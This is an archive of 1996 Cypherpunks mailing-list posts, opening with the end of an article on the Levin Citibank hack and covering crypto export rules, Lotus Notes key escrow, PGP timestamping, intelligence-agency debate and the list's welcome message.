multistep deception game.  Of course, the Citibank's face-saving 
version of events sounds not that convincing, taking into account a 
large number of uncontrollable players, a sizable amount of real cash 
involved, multicontinental reach of the overall crime scheme and the 
fact that the bank was ultimately unable to recover a substantial 
chunk of its own money. 
 
Not your ordinary self-taught hacker, Mr. Levin, 31, an aloof man and 
a graduate of a prestigious Department of Applied Mathematics, was 
considered somewhat of a computer genius in the St. Petersburg's 
University circles.  The scheme started when Mr. Levin's 
acquaintance, a Russian-American wholesale trader, asked him to 
develop programming support for his international trading business. 
 
According to Mr. Levin's university friends, the idea of breaking 
into secure bank networks has been born somewhat spontaneously during 
a purely technical discussion on the advantages and disadvantages of 
different bank networking programs.  The debaters were members of a 
St. Petersburg's group of elite computer experts that could best be 
described as a local response to the Internet's own Cypherpunk 
community.  I found it fascinating and somewhat ironic that the 
infiltration plot had actually started as a low-key bet that the 
Russian famous resourcefulness would triumph where the famed Yankee 
ingenuity has already proven to be unsuccessful! 
 
In the overall crime scheme, Levin was supported by as many as 30 
collaborators, at least some of them computer experts.  Several of 
his partners-in-crime, arrested in the U.S., Russia, Israel and the 
Netherlands, were primarily involved in cash retrieval and 
laundering, ultimately the most vulnerable part in any grand scheme 
of electronic theft.  It is hardly a secret that most professional 
bankers are routinely trained to contest, or at least report to 
authorities, any suspicious withdrawal of large sums of cash.  Some 
of the U.S. arrests have been successfully kept in secret for many 
months, for the fear of alerting the criminals back in Russia.  Mr. 
Levin himself was arrested in September 1995 in a UK airport, en-
route through that country. 
 
Apparently, in the best tradition of this fledging industry, Citibank 
have already used the lessons obtained from Mr. Levin's penetration 
to beef up the security of its own electronic payment system.
COPYRIGHT
=========

The Journal Of Internet Banking And Commerce is Copyright (C) 1996
by ARRAY Development, Ottawa, Canada.  All Rights Reserved.

Copying is permitted for noncommercial, educational use by academic 
computer centers, individual scholars, and libraries.  This message 
must appear on all copied material.  All commercial use requires 
permission.



__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 22 Jan 1996 00:01:42 +0800
To: cypherpunks@toad.com
Subject: Re: "Noise Filter" : Cypherpunks Lite Reminder...
Message-ID: <v02120d01ad28057284a5@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>Just a friendly reminder to those of you overwhelmed by the noise...

While we're plugging things,

Don't forget e$pam, which has (mostly) e$-related cypherpunks postings, and
e$-filtered stuff from usenet newsgroups, and from as many mail groups as
the subscribers find for me to look at. The AustrianECON list has talks
about Hayek, Mises, et. al., and I zinged something to e$pam from it
recently about currency boards, fiat money and all that stuff.

Both e$spam, and it's companion discussion list, e$, are free. They're
sponsored by OKI Advanced Products and Hyperion, and anyone else who cares
to, for a rediculously cheap charter sponsorship rate ;-). The sponsor tags
are in the .sig of each message.

You can subscribe to e$pam and e$ by looking at the e$ home page,

http://thumper.vmeng.com/pub/rah/ .

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 22 Jan 1996 03:09:29 +0800
To: cypherpunks@toad.com
Subject: Re: Hassles taking App. Crypt. to Taiwan?
Message-ID: <ad27cc3e00021004d4da@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:49 PM 1/21/96, Daniel A. Monjar wrote:
>I've lurked for quite a while now.  It is time to ask my first newbie
>question.  I'll be going to Taiwan for three weeks in March.  Is there
>likely to be any problems at US or Taiwan customs  if I take
>Applied Cryptology 2/e along for personal study?

No.

The U.S. rarely inspects outgoing stuff (I've never even seen an
international departure area that has the facilities for Customs
inspection). Unless tipped-off that some crime they are investigating is
involved.

Even if it ultimately gets established that printed books can require
export permits--something I don't expect--the enforcement of such a
situation would be problematic in the extreme. They might stop a cargo
pallet from being shipped to Slobostan, but not individual books carried in
luggage. "Don't ask, don't tell."

On the Taiwan side, though, they may wonder why you brought an expensive
U.S.-printed copy when you get the special rice-paper edition of "Applied
Cryptography, 2nd Ed." for the equivalent of $2.25 in Taipei's book stalls.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 22 Jan 1996 03:52:38 +0800
To: cypherpunks@toad.com
Subject: Re: Wipe Swap File
In-Reply-To: <ad266bbe08021004727d@[205.199.118.202]>
Message-ID: <9oF3HD85w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> >Degaussing the media (running a household magnet over it :-) may be an optio
>
> Ordinary household magnets fail for a couple of reasons:

I've just established experimentally that thoroughly running a household magnet
over a 3.5" floppy messed up less than 1/2 the sectors I tried to read.

Not a good option even for floppies.

(Actually, there _was a smiley up there)

> >1. Does anyone know a cheap way to recover the traces of the previous
> >(overwritten) recordings on the media?
>
> There are custom drives for various media which have multiple heads, and
> heads that can be "jogged" a little bit. This allows, I have read, the
> subtle variations of multiple writes to be extracted.
>
> Much more expensive would be various electron microscope-based imaging
> methods to directly image the domains and extract subtle signs of past
> write cycles.

I'll go on a tangent (this has more of a stego than crypto code relevance):

In the early '80s there was much activity related to floppy disk based
copy protection schemes (we got our first PC in Dec 81; most folks today
know dongles, but may not remember disk-based copy protection). The
original IBM PC came with 360K 5.25" floppy drives and a very smart
floppy disk controller chip that was capable of much more than what
the IBM BIOS normally asked of it; and even the BIOS was capable of
much more (floppy disk related) than PC DOS required.

One of the neater tricks I've seen were the so called "weak bits". One
could confuse the FDC and write a sector in such a way that when subsequently
someone read it, he saw 1's some of the times and 0's at other times.
Naturally, the FDC noted the CRC error on the sector. The copy protection
checker could read the sector several times into different buffers and see
that it got different results every time.

I rummaged around my archives and found an assembly program (about 10K)
that I once wrote (dated Jan 84) which I think did exactly this. I can
e-mail it to anyone who cares to take a look. (Disclaimer: I no longer remember
what it does, but I think this is the one with weak bits.)

I would not be very surprised if it turned out to be possible to confuse the
floppy disk controller (or some hard disk controllers) by software alone, so
that instead of operating "correctly" and reading the most recently written
data, it would operate "incorrectly" and pick up traces of the overwritten
bits from the media.

Jim Bell mentioned the trick of hiding information into 'extra' tracks and
sectors not used by the usual DOS formatting. It's very old too. I think I saw
copy protection schemes circa 1982 that hid important data on tracks 41--43.
360K diskettes normally had 40 tracks. If the diskette was copies by DISKCOPY,
it didn't know about the extra tracks, and the copy didn't have the info
(usually, a piece of the program). It's very easy to do with just BIOS calls to
format/read/write the track. Problem is, many cheap floppy drives these days
aren't capable of seeking beyond track 80 when the FDC asks them to. You can
write the data there and give the floppy to a friend who won't be able to read
it from there.

Microsoft uses a variation of this scheme when it formats its distribution
diskettes for some products with additional sectors on every track (and
presumably a smaller inter-sector gap, and good media). Some may recall that
the original PC DOS 1.x formatted disks with 8 sectors/track (for 160K/320K)
and 2.x and later started formatting 9 sectors. There was a popular hack to put
10 sectors on a track (including a DOS device driver to read such disks).
This too can be accomplished by BIOS without any FDC hacking.

(Thanks also to tallpaul for info on Vogons)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Mon, 22 Jan 1996 01:10:27 +0800
Subject: NOISE.SYS Stupid Bugs w/Int13h
Message-ID: <DLJDM7.I6z@news2.new-york.net>
MIME-Version: 1.0
Content-Type: text/plain


There's an unpleasant bug in NOISE.SYS, BTW.  It doesn't properly
return the flags from the Int 13h handler, so disable that for now
unless you'd like to do funky things to your disks.

Sorry 'bout that.

Rob.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jwarren@well.com (Jim Warren)
Date: Mon, 22 Jan 1996 07:33:13 +0800
To: Alex Strasheim <cypherpunks@toad.com
Subject: Re: Netscape and NSA
Message-ID: <v02120d0ead2879117875@[206.15.66.121]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:02 AM 01/19/96, Alex Strasheim wrote:
>...
>
>I'm personally a little frustrated by the timidity of industry's
>response.  I don't understand it.  Netscape's interests are clear, their
>voice is loud, and their resources are vast.  Where's John D. Rockefeller
>when you need him?

Having served on the Board of a half-billion-buck revenue software for half
a decade, I will tell you -- from having once been on "the inside" -- that
there is one and only one focus for almost all publicly-traded corporations
... optimization of profits in the next quarter.

This *often* involves a broad range of cooperation with government agencies
-- especially if/when the corporation is trying to peddle its products to
the guv'ment.  Corp management *know* how helpful -- or foot-dragging
harmful -- bureaucrats can be ... and our current administration has been
*hot* to have crypto suppression and wiretap expansion, big time!

(The [unproven] word I've gotten from inside of Washington legal circles is
that when Clinton hit the White House, the spooks and enforcers were there
with endless horror stories about how the sky will fall and vile terrorists
will bomb every building if they don't have unfettered electronic snooping
freedom.  And Clinton, never having dealt with national security issues
before and having a total non-record re enforcement or int'l affairs, was
totally cowed by the very effective bureau and agency terrorists ... uh,
fear peddlers.

--jim

There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 22 Jan 1996 09:02:58 +0800
To: cypherpunks@toad.com
Subject: Re: "Trustworthy" PGP Timestamping Service ??
Message-ID: <ad27fbf00302100409e3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:51 PM 1/21/96, Matthew Richardson wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>I have recently setup a free PGP timestamping service which operates
>by email.
>
>The objective of the service is to be able to produce "trustworthy"
>timestamps which cannot be backdated without detection.  It achieves
>this by:-
>
>(a)  giving every signature a unique sequential serial number;
>
>(b)  every day making a ZIP file of that day's detached signatures
>and feeding the ZIP file back for signing (and hence the assignment
>of another serial number);
...

It sounds like a variant of the Haber and Stornetta work on digital
timestamping, about which much has been written on our list (check the
archives, and/or sections of my Cyphernomicon).

They have a company, Surety, which is doing this (or was, last time I heard).

www.surety.com will get you there.

My hunch is that your scheme implements a version of a hash (the idea of
hashing the doc and then publishing the hash as a "widely witnessed event,"
in Haber and Stornetta terms) that could infringe on their patents
(assuming they applied, as I recall hearing they did).

Before you go much further on this, it would behoove you to check on what
they are doing and on what patents, if any, you might need to license.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul M. Cardon" <pmarc@fnbc.com>
Date: Mon, 22 Jan 1996 09:10:06 +0800
To: "Richard Martin" <rmartin@aw.sgi.com>
Subject: Re: Espionage-enabled Lotus notes.
In-Reply-To: <9601181638.AA01736@zorch.w3.org>
Message-ID: <199601212208.QAA00308@abernathy.fnbc.com>
MIME-Version: 1.0
Content-Type: text/plain


An individual almost but not quite entirely unlike Richard Martin wrote:
> They've forced a major company (they don't come much more major
> than IBM) to ship a product which actually helps them in both
> aspects of their mandate. Communications interception of foreign
> industries' groupware is now easier for the U.S. than for any other
> country, while (and this must be granted) the communications
> security of American industries will be somewhat improved by this
> move.

But how does this affect the use of Notes for US companies with  
foreign offices?  If foreign offices are required to use the "export  
version" (which IS supposedly interoperable with the domestic  
version), then Notes use between a foreign office and US office will  
have a 40 bit key as far as the government is concerned.  This  
assumption may be incorrect, but until I know what the effective key  
size is as seen by the government when the export and domestic  
versions communicate, I have to assume that the export version will  
have to dominate the effective key length.  In other words, the  
domestic version will be able to handle and generate keys with the  
24 government accesible bits, but naturally, keys generated by the  
domestic version will not be usable by the export version.

Are US businesses willing to swallow this when the use is purely  
internal to the company?  Does the national security argument hold  
up in this situation?

This really does so little to improve the security situation that I  
can see why Mr. Ozzie is not comfortable with this compromise as  
anything but a short-term solution.  I hope his statement is  
sincere.  I'm asking a lot of questions at this point because my own  
opinions are not fully formed on all of the relevant issues.

---
Paul M. Cardon
System Officer - Capital Markets Systems
First Chicago NBD Corporation (for whom I do not opine)

MD5 (/dev/null) = d41d8cd98f00b204e9800998ecf8427e




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 22 Jan 1996 08:06:40 +0800
To: cypherpunks@toad.com
Subject: CIA Stashes
Message-ID: <199601212341.SAA02445@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Reuter has a brief story today about "80 secret U.S.
   weapons arsenals that remain scattered across Austria for
   40 years after they were hidden in case of a Soviet
   invasion" for use by resistance fighters.

   It says the CIA stockpiled the weapons without telling the
   Austrian government. The Austrian paper Kurier quotes the
   U.S. Ambassor as saying the CIA only recently informed
   Congress about the weapons stash.

   Does anyone in Austria or elsehere have more on this?

   -----

   In a related matter, on Friday C-SPAN 2 aired several hours
   of comments and proposals by intel experts before the US
   Commission on Intelligence Reform. Mephistophelean former
   NSA head Admiral Bobby Ray Inman proposed among other
   brain-wavers to reorganize the thirteen or so bloated,
   bumbling, cat-fighting intelligence agencies:

   1. Establish a new International Operations Agency to
      combine all operations units -- civilian and military --
      into one, separate from the CIA -- which he thinks has
      irretrievably lost operations credibility.

   2. CIA to do all intelligence analysis, but no collecting,
      to avoid contamination caused by "ownership of the
      data." The military to do intelligence collection and
      analysis only needed for immediate operations.

   3. FBI to do all counter-intelligence, domestic and
      international, with agents stationed overseas.

   4. Defense to do all imagery.

   5. NSA/NRO/???, though not named in open session,
      presumably would continue ELINT and SIGINT.

   6. All this will be very expensive, he roostered,
      intelligence on the cheap is worthless.

   7. The total intelligence budget to be made public but no
      further breakdown of how the the pot of gold is
      distributed to supplicants is to be confessed.

   Former Ambassador to China Tilley, a 25-year veteran of CIA
   operations, emphasized the importance of continuing Non
   Official Cover operations, which, he said, are invaluable
   very-long term penetrations. He cited those he set up in
   China as COS and then revisited fifteen years later as
   ambassador -- still ferreting deepest of demon red-commie
   secrets, he black-comicly glowered to the glazed-eyes. NOC,
   while very expensive, is crucial, he, too, parroted.

   For the full eye-opening pack of lies to replenish the pot 
of
   gold, Tilley co-conspired that a closed session was needed.

   But all the intel gold-digging experts testified to that,
   grinning malevolently, thus continuing the grand tradition
   of looting national treasuries top-secret cloaked by
   national interest.

   So, where are all those not-yet-reported CIA Non Official
   Cover stashes of gold bullion (or $100 bills) to pay the
   world-wide "resistance fighters" for illusory supremacy?












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: matthew@itconsult.co.uk (Matthew Richardson)
Date: Mon, 22 Jan 1996 03:02:30 +0800
To: cypherpunks@toad.com
Subject: "Trustworthy" PGP Timestamping Service ??
Message-ID: <310288d0.13035213@itconsult.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have recently setup a free PGP timestamping service which operates 
by email.

The objective of the service is to be able to produce "trustworthy" 
timestamps which cannot be backdated without detection.  It achieves 
this by:-

(a)  giving every signature a unique sequential serial number;

(b)  every day making a ZIP file of that day's detached signatures 
and feeding the ZIP file back for signing (and hence the assignment 
of another serial number);

(c)  making available details of the highest serial number on each 
day as well as the signed ZIP files via email (and shortly WWW);

(d)  weekly publishing details of the DETACHED signatures of the ZIP 
file in alt.security.pgp and to users requesting them on a list 
server.

I would be interested in folks comments on this "trustworthiness", 
including any weaknesses or possible improvements.

Full details of the service can be found at:-
     http://www.itconsult.co.uk/stamper.htm

Thank you in advance.

Best wishes,
Matthew

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAgUBMQKHtAKwLwcHEv69AQFVLgQAjVyX5w0YM75gskinZ74dkqQ9vDfnOlWt
OD28p/0ot+85q+UP8hreS61Fs1bGDqgH5YL3/2Lviy+xhlIj9x8kVw+Rj1KrZvI+
Jt7pInfqwdx9gYxVGDuP0rIcCH+74vFWQJu1UMpZWORq4gv4t/IS1cBJJRaYSyrM
hhcdHPRU6RE=
=qD+L
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Mon, 22 Jan 1996 08:45:37 +0800
To: John Young <jya@pipeline.com>
Subject: Re: CIA Stashes
In-Reply-To: <199601212341.SAA02445@pipe2.nyc.pipeline.com>
Message-ID: <Pine.SOL.3.91.960121193140.27199B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 21 Jan 1996, John Young wrote:


[...]
> 
>    In a related matter, on Friday C-SPAN 2 aired several hours
>    of comments and proposals by intel experts before the US
>    Commission on Intelligence Reform. Mephistophelean former
>    NSA head Admiral Bobby Ray Inman proposed among other
>    brain-wavers to reorganize the thirteen or so bloated,
>    bumbling, cat-fighting intelligence agencies:
> 
[...]
> 
>    Former Ambassador to China Tilley, a 25-year veteran of CIA
>    operations, emphasized the importance of continuing Non
>    Official Cover operations, which, he said, are invaluable
>    very-long term penetrations. He cited those he set up in
>    China as COS and then revisited fifteen years later as
>    ambassador -- still ferreting deepest of demon red-commie
>    secrets, he black-comicly glowered to the glazed-eyes. NOC,
>    while very expensive, is crucial, he, too, parroted.
> 
[...]

My eyes were glazing over but I think I heard him say that it was a nice 
intelligence service practice to pass along useful info to 
friendly businessmen in exchange for their help.

So there you have confirmation of at least some "economic intelligence" 
activity.

bd





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Mon, 22 Jan 1996 10:01:41 +0800
Subject: No Subject
Message-ID: <QQzznz03600.199601220158@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


January 15th Fortune (don't normally read it, but I picked up a free copy)
has a lengthy and evidently well-researched article bylined Richard Behar
on the efforts of BFI, a large regional trash hauler and recycler, to
break into the (by most accounts) Mafia-controlled garbage collection
industry in New York City. 

Cypherpunk relevance: BFI is cooperating closely with the DA in helping to
prosecute its allegedly mob-affiliated competitors, which raises a lot of
very interesting questions, for which I have yet to formulate any answers.
Also a sidenote about how NYC's disclosure laws actually aid organized
crime by helping the various bosses track who owns what territory. 

Electronic surveillance. Money laundering. Steganography (sending messages
by way of the disembodied head of a dog). Open access to information and
free-market capitalism versus violent bozos, with and without uniforms.
Pen trumps sword. 

Rich says check it out.
-- 
Rich Graves
Fucking Statist




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Mon, 22 Jan 1996 12:43:55 +0800
Subject: No Subject
Message-ID: <QQzznz03664.199601220158@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9601200326.AA09366@toad.com>, Peter Trei <trei@process.com> wrote:
> > > If they're nasty, they'll check on the receiving side as well, to
> > > ensure that the LEAF and/or the espionage-enabling key have not been
> > > patched in the sending 'International' version.
> > 
> > Nearly impossible. Why? Because they can only include the public key,
> > and not the private key, of the GAK authority in the code. You can
> > encrypt the three bytes of key, but it is very hard for a receiver
> > other than the govvies to read them. There is no shared secret
> > information or private information available, ergo, they can't check
> > their LEAF equivalent.
> 
> Think it through. 
   [suggesting that Alice encrypts 24 bits of key under NSA's public key,
    Bob repeats calculation and checks that the two LEAFS are the same]
> Thus, you can prevent a non-complying copy  of Lotus from talking to 
> a complying copy of Lotus, which is one of the goals of the GAKers.

No, you're wrong, the process you've described does not work.

Note that RSA normally is used as probabilistic encryption: encrypt the
same plaintext twice, and you'll likely get two different ciphertexts.
Thus, if RSA is used in the normal probabilistic way, the receiver can't
tell whether the sender was compliant.

Now you might suggest that the sender should not include probabilistic
padding, and use RSA deterministically, so that (somehow) the receiver
can check whether those 24 bits are correct.  That again won't work,
since a third-party eavesdropper will be able to do a 2^24 brute force
calculation to recover those 24 bits.

There are complicated ways to prevent a non-compliant copy of Lotus from
inter-operating with a compliant copy (as others on cypherpunks have kindly
pointed out), but they are complicated, and would require a re-design of
Lotus Notes' encryption module.  Since the export version is interoperable
with the non-export version, this would seem to require too much foresight
and work to be very likely.

In any event, I've heard that the export version of Lotus Notes 4 always
sends a LEAF, but the receiver never checks it.  So I think a simple binary
patch to change the NSA's public key should work.

P.S.  So does anyone know how large the NSA's public LEAF key is?
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMQKzSyoZzwIn1bdtAQF/zAGAxODShPqrBQLsWzRVAkW7+jbVJidQIF5q
1Jyisn2EedTQoBLHnZD7ojnmws807XZK
=bRAO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut01@cs.auckland.ac.nz
Date: Sun, 21 Jan 1996 17:49:30 +0800
To: llurch@networking.stanford.edu
Subject: Re: Idea for "friendly" Windows password hack
Message-ID: <199601210936.WAA22159@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


>Why not provide a way to grab the passwords cached in RAM, encrypt them
>securely, put them away somewhere, and scramble the original copy of the
>passwords in RAM so that Microsoft's code can't get to them?
 
Ahh, the problem is the "put them away somewhere" part.  There's nowhere to put
them.  The solution I'm using now for an (unreleased) variant of SFS is to
store encryption keys in write-only hardware as per FIPS PUB 140-1, but that's
hardly practical for most systems.  The same standard also allows for key
storage in software, but at the minimum useful level (level 2) you need at
least a C2-certified OS to protect the keys (the standard is good reading when
it comes to protecting encryption subsystems BTW, as are the specs for things
like GSS-API and GCS-API).  This isn't going to happen under Win'95 (for
example, here's how to get to any keys held in memory by the OS: Win'95 allows
for demand-loaded VxD's, so you run a trojan with an embedded VxD which
searches the system VM for the keys and then unloads itself). It would require
a significant reengineering of Win'95 to make it even passably secure (assuming
MS don't screw up the implementation), and I don't think it's practical to do.
Under NT you can do it to some extent because this level of security was
designed in from the start.
 
Peter.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@toad.com
Date: Wed, 24 Jan 1996 18:47:27 +0800
To: cypher@infinity.nus.sg
Subject: Your Majordomo request results
Message-ID: <9601230834.AA13943@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


--

Your request of Majordomo was:
>>>> subscribe cypherpunks
Succeeded.
Your request of Majordomo was:
>>>> end
END OF COMMANDS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@toad.com
Date: Tue, 23 Jan 1996 16:35:49 +0800
To: cypher@infinity.nus.sg
Subject: Welcome to cypherpunks
Message-ID: <9601230835.AA13950@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


--

Welcome to the cypherpunks mailing list!

If you ever want to remove yourself from this mailing list,
you can send mail to "Majordomo@toad.com" with the following command
in the body of your email message:

    unsubscribe cypherpunks Cypherpunks Mailing List <cypher@infinity.nus.sg>

Here's the general information for the list you've
subscribed to, in case you don't already have it:



About cypherpunks
-----------------

I. Administrivia (please read, boring though it may be)

The cypherpunks list is a forum for discussing personal defenses for
privacy in the digital domain.  It is a high volume mailing list.  If
you don't know how to do something, like unsubscribe, send mail to

	majordomo@toad.com

and the software robot which answers that address will send you back
instructions on how to do what you want.  If you don't know the
majordomo syntax, an empty message to this address will get you a help
file, as will a command 'help' in the body.  Even with all this
automated help, you may still encounter problems.  If you get really
stuck, please feel free to contact me directly at the address I use
for mailing list management:

	cypherpunks-owner@toad.com

Please use this address for all mailing list management issues.  Hint:
if you try to unsubscribe yourself from a different account than you
signed up for, it likely won't work.  Log back into your old account
and try again.  If you no longer have access to that account, mail me
at the list management address above.  Also, please realize that 
there will be some cypherpunks messages "in transit" to you at the
time you unsubscribe.  If you get a response that says you are unsubscribed,
but the messages keep coming, wait a day and they should stop.

For other questions, my list management address is not the best place,
since I don't read it every day.  To reach me otherwise, send mail to

	eric@remailer.net

This address is appropriate for emergencies (and wanting to get off
the list is never an emergency), such as the list continuously spewing
articles.  Please don't send me mail to my regular mailbox asking to
be removed; I'll just send you back a form letter.

Do not mail to the whole list asking to be removed.  It's rude.  The
-request address is made exactly for this purpose.

To post to the whole list, send mail to

	cypherpunks@toad.com

If your mail bounces repeatedly, you will be removed from the list.
Nothing personal, but I have to look at all the bounce messages.

There is no digest version available.

There is an announcements list which is moderated and has low volume.
Announcements for physical cypherpunks meetings, new software and
important developments will be posted there.  Mail to

	cypherpunks-announce-request@toad.com

if you want to be added or removed to the announce list.  All
announcements also go out to the full cypherpunks list, so there is no
need to subscribe to both.


II. About cypherpunks

The cypherpunks list is not designed for beginners, although they are
welcome.  If you are totally new to crypto, please get and read the
crypto FAQ referenced below.  This document is a good introduction,
although not short.  Crypto is a subtle field and a good understanding
will not come without some study.  Please, as a courtesy to all, do
some reading to make sure that your question is not already frequently
asked.

There are other forums to use on the subject of cryptography.  The
Usenet group sci.crypt deals with technical cryptography; cypherpunks
deals with technical details but slants the discussion toward their
social implications.  The Usenet group talk.politics.crypto, as is
says, is for political theorizing, and cypherpunks gets its share of
that, but cypherpunks is all pro-crypto; the debates on this list are
about how to best get crypto out there.  The Usenet group
alt.security.pgp is a pgp-specific group, and questions about pgp as
such are likely better asked there than here.  Ditto for
alt.security.ripem.

The cypherpunks list has its very own net.loon, a fellow named L.
Detweiler.  The history is too long for here, but he thinks that
cypherpunks are evil incarnate.  If you see a densely worded rant
featuring characteristic words such as "medusa", "pseudospoofing",
"treachery", "poison", or "black lies", it's probably him, no matter
what the From: line says.  The policy is to ignore these postings.
Replies have never, ever, not even once resulted in anything
constructive and usually create huge flamewars on the list.  Please,
please, don't feed the animals.


III. Resources.

A. The sci.crypt FAQ

anonymous ftp to rtfm.mit.edu:pub/usenet-by-group/sci.crypt

The cryptography FAQ is good online intro to crypto.  Very much worth
reading.  Last I looked, it was in ten parts.

B. cypherpunks ftp site

anonymous ftp to ftp.csua.berkeley.edu:pub/cypherpunks

This site contains code, information, rants, and other miscellany.
There is a glossary there that all new members should download and
read.  Also recommended for all users are Hal Finney's instructions on
how to use the anonymous remailer system; the remailer sources are
there for the perl-literate.

C. Bruce Schneier's _Applied Cryptography_, published by Wiley

This is required reading for any serious technical cypherpunk.  An
excellent overview of the field, it describes many of the basic
algorithms and protocols with their mathematical descriptions.  Some
of the stuff at the edges of the scope of the book is a little
incomplete, so short descriptions in here should lead to library
research for the latest papers, or to the list for the current
thinking.  All in all, a solid and valuable book.  It's even got
the cypherpunks-request address.


IV. Famous last words

My preferred email address for list maintenance topics only is
hughes@toad.com.  All other mail, including emergency mail, should go
to hughes@ah.com, where I read mail much more regularly.

Enjoy and deploy.

Eric

-----------------------------------------------------------------------------

Cypherpunks assume privacy is a good thing and wish there were more
of it.  Cypherpunks acknowledge that those who want privacy must
create it for themselves and not expect governments, corporations, or
other large, faceless organizations to grant them privacy out of
beneficence.  Cypherpunks know that people have been creating their
own privacy for centuries with whispers, envelopes, closed doors, and
couriers.  Cypherpunks do not seek to prevent other people from
speaking about their experiences or their opinions.

The most important means to the defense of privacy is encryption. To
encrypt is to indicate the desire for privacy.  But to encrypt with
weak cryptography is to indicate not too much desire for privacy.
Cypherpunks hope that all people desiring privacy will learn how best
to defend it.

Cypherpunks are therefore devoted to cryptography.  Cypherpunks wish
to learn about it, to teach it, to implement it, and to make more of
it.  Cypherpunks know that cryptographic protocols make social
structures.  Cypherpunks know how to attack a system and how to
defend it.  Cypherpunks know just how hard it is to make good
cryptosystems.

Cypherpunks love to practice.  They love to play with public key
cryptography.  They love to play with anonymous and pseudonymous mail
forwarding and delivery.  They love to play with DC-nets.  They love
to play with secure communications of all kinds.

Cypherpunks write code.  They know that someone has to write code to
defend privacy, and since it's their privacy, they're going to write
it.  Cypherpunks publish their code so that their fellow cypherpunks
may practice and play with it.  Cypherpunks realize that security is
not built in a day and are patient with incremental progress.

Cypherpunks don't care if you don't like the software they write. 
Cypherpunks know that software can't be destroyed.  Cypherpunks know
that a widely dispersed system can't be shut down.

Cypherpunks will make the networks safe for privacy.

[Last updated Mon Feb 21 13:18:25 1994]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Tue, 23 Jan 1996 19:45:34 +0800
To: Anonymous User <nobody@c2.org>
Subject: Re: PZ a Nazi?
In-Reply-To: <199601230400.UAA29972@infinity.c2.org>
Message-ID: <Pine.3.89.9601230604.A10109-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


I understand it's much easier to sue a  publication for libel in the UK, 
maybe PRZ can recover some of his legal costs ;}

Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 

